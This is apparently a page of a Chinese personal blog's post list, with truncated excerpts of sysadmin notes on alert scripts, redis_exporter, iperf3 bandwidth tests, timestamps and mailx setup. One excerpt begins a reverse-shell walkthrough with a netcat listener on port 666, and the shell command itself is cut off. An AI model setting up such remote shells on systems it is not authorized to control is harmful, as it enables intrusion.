上一页 1 ··· 3 4 5 6 7 8 9 10 11 下一页
摘要: alert.sh #!/bin/shcorpId=xxxxxxxxxxxcorpSecret=xxxxxxxxxxxxxxxxxxx... 阅读全文
posted @ 2019-08-07 14:56 M1927 阅读(145) 评论(0) 推荐(0)
摘要: 启动 nohup ./redis_exporter -web.listen-address :9121 -redis.addr x.... 阅读全文
posted @ 2019-07-29 19:15 M1927 阅读(366) 评论(0) 推荐(0)
摘要: 参考自: https://blog.51cto.com/xujpxm/2080146 https://github.com/hnlq... 阅读全文
posted @ 2019-07-24 18:36 M1927 阅读(255) 评论(0) 推荐(0)
摘要: 1 申请企业微信账号并创建告警应用 https://work.weixin.qq.com 2 获取到以下信息 corp_id api... 阅读全文
posted @ 2019-07-17 14:33 M1927 阅读(275) 评论(0) 推荐(0)
摘要: Centos 7 客户端、服务端安装iperf3 qperf yum install -y iperf3 qperf 带宽测试 TC... 阅读全文
posted @ 2019-04-19 18:09 M1927 阅读(58) 评论(0) 推荐(0)
摘要: 控制主机 192.168.60.111 用nc监听666端口 nc -l 666 被控主机 192.168.60.222 执行反弹s... 阅读全文
posted @ 2019-04-18 17:20 M1927 阅读(33) 评论(0) 推荐(0)
摘要: Unix时间戳(英文为Unix epoch, Unix time, POSIX time 或 Unix timestamp) 是从1... 阅读全文
posted @ 2019-04-18 16:17 M1927 阅读(426) 评论(0) 推荐(0)
摘要: 安装 yum install -y mailx 修改/etc/mail.rc set from=test@xxx.com set smtp=smtp.xxx.com set smtp-auth-user=test set smtp-auth-password="xxxxxx" set smtp-au 阅读全文
posted @ 2019-02-20 16:17 M1927 阅读(34) 评论(0) 推荐(0)
摘要: https://blog.csdn.net/gaozongzonggao/article/details/80793864 ... 阅读全文
posted @ 2019-01-18 17:37 M1927 阅读(7) 评论(0) 推荐(0)
摘要: https://blog.csdn.net/mbxc816/article/details/7473906 apt-cache命令 ... 阅读全文
posted @ 2019-01-18 16:11 M1927 阅读(90) 评论(0) 推荐(0)
上一页 1 ··· 3 4 5 6 7 8 9 10 11 下一页